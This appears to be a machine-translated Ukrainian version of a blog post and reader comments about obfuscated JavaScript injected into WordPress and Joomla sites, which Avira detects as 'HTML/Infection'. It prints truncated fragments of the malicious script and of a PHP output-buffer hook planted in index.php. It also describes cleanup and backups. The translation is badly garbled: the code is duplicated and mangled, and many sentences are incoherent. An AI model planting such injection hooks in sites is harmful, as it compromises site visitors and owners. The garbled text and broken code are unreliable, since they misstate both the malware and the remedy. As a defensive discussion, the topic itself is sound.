HTML / Останні загрози нападу WordPress і Joomla
Цікаве пояснення атаки повинні бути прийняті imaginepaolo http://www.settorezero.com/ :
Це відбувається частіше останнім часом, що багато сайтів на основі WordPress і Joomla, напали в деякому роді троянцем повідомив Avira як "HTML / Останні загрози". Я не можу сказати, якщо це проблема з помилками, що існують в цих двох видавничих систем (але я сумніваюся в цьому), або, скоріше, вірусом, який атакував сервери яких розміщені ці сайти.
Остання гіпотеза я підтверджується тим фактом, що всі люди, я зв'язався і хто була та ж проблема, все в той же хостинг-провайдера. Не рухатися навіть звинувачення на даний момент, тому що це кілька аномальних і мережі я не знайшов задовільного інформації, щоб зробити правильне припущення, так що мій тільки припущеннями, і повинна розглядатися як така.
У той же час я сподіваюся, що це повідомлення може бути корисним і обговорити, щоб побачити, де ця проблема виникає.
Перш за все, це означає, що вірус змінює сторінок (але не завжди всі сторінки) з розширеннями HTML, PHP, ASP і JS, додавши, зашифрований код JavaScript, який більш-менш починається так:
"javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Мова = "javascript"> $ = \ "Z64dZ3dZ22q | якщо | qdu] qwys rub8tqiZ3c0 ^ е}}Я говорю "більш-менш", бо не все виглядає так же, все одно легко виявити шкідливий код, тому що, як бачите, кілька затемнюється: ключові слова не тільки читати, але послідовність символів, здавалося б, абсурд.
Що стосується WordPress, тим не менш, шкідливий код зазвичай вставляється на кожній сторінці "index.php" і починається так:
1 ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <Php ob_start ("security_update"); функція security_update ($ буфера) {return $ буфера "<script Language= \" JavaScript \"> $ = \" Z64dZ3dZ22q | якщо | qdu] qwys ^ е.}?Схоже, що сценарій не викликає пошкодження і тільки виявити Avira (запитати підтвердження). Проблема вирішується шляхом видалення скрипта зі сторінок вважається шкідливим, або зарядка здоровий копія сторінки на сервері.
Деякі користувачі, однак, після зараження вірусом, вони виявили копію сайту (або інших веб-сторінок), що зберігається на комп'ютері з цією проблемою, то атака, здається, "місцеві", а не віддаленого: сторінки, здається, бути приєднані на одному комп'ютері, в якому вони проживають. Це змушує мене думати більше і більше, на якому розміщується проблема: насправді багато з них мають на своїх комп'ютерах копії сайту не заражений, а на сервері, а не представляти цей сценарій сторінок.
Рішення, щоб мати можливість захистити вас завжди є резервні копії вашого сайту на вашому комп'ютері і порядок на вашому веб-сайті, якщо ми не були надані.
Я наведу тут деякі корисні посилання (в основному на WordPress), пов'язаних з проблемою представлені:
http://codex.wordpress.org/FAQ_My_site_was_hacked ~ ~ V
Схожі повідомлення
Коментарі
Оголошення















[...] ЗАГРОЗА м'який - здається, насправді, загроза, яка одразу ж впізнала його майже тільки Avira (і [...]
Сталося мені два рази на 20 днів. :-S
Це трапилося зі мною подібний напад (не пам'ятаю, якщо код був таким же), в листопаді минулого року.
Я знайшов і видалив шкідливий код за допомогою антивірусного плагіна WordPress. Але я зробив те, що я читав, було найкраще, що робити: я перевстановити все, починаючи від теми плагін, я також змінив адресу і пароль. З тих пір, поки все добре ... але я говорю тихо.
Привіт!
Я намагаюся шукати рядки коду, які ви вказали, але все одно нічого. Я скачав всі записи моїх крім папки і MDB-базі даних.

[...] Привіт, привіт Turbo Спробуйте подивитися на форумах Joomla, інші мають ті ж проблеми. HTML / Останні загрози нападу WordPress і Joomla | Веб-дизайн [+ питання вирішено] HTML / Останні загрози HTML / Останні загрози нападу WordPress і Joomla | сектор [...]
Спасибо!
Я вирішив цю проблему шляхом видалення скрипта.
Він був названий індексувати всі сторінки, навіть ті, index_1. index_old, копіює старих зміни.
Спасибі ще раз ... Я повинен вам користь
Привіт
Те ж саме трапилося зі мною, не в перший раз в Аруба (послуг), але це сталося 7 або 8 разів: починаю думати, що це цілеспрямовані атаки на продаж антивірусних є додатковою послугою і оплачується: Очевидно, що провайдери будуть змінюватися зі швидкістю світла.
Мої підозри цілком виправдані, навіть у цій останньої атаки я обмежив число активованих плагінів (все "сертифікованих" і завантажити з wp.org), і я збудував сам шаблон ... в цей момент, так як Проблема тільки коли вкриті сайти, розміщені на Арубі мене є всі підстави сумніватися в літо ... дуже погано, але якщо я можу на вихідних я купив інший хостинг. якщо у вас є пропозиції вітаються
Я не думаю, що це уразливості в WordPress, у мене версія 2.9.2, яка була якийсь час прекрасно і стабільно (насправді я не оновлювали до 3 побоюючись атак)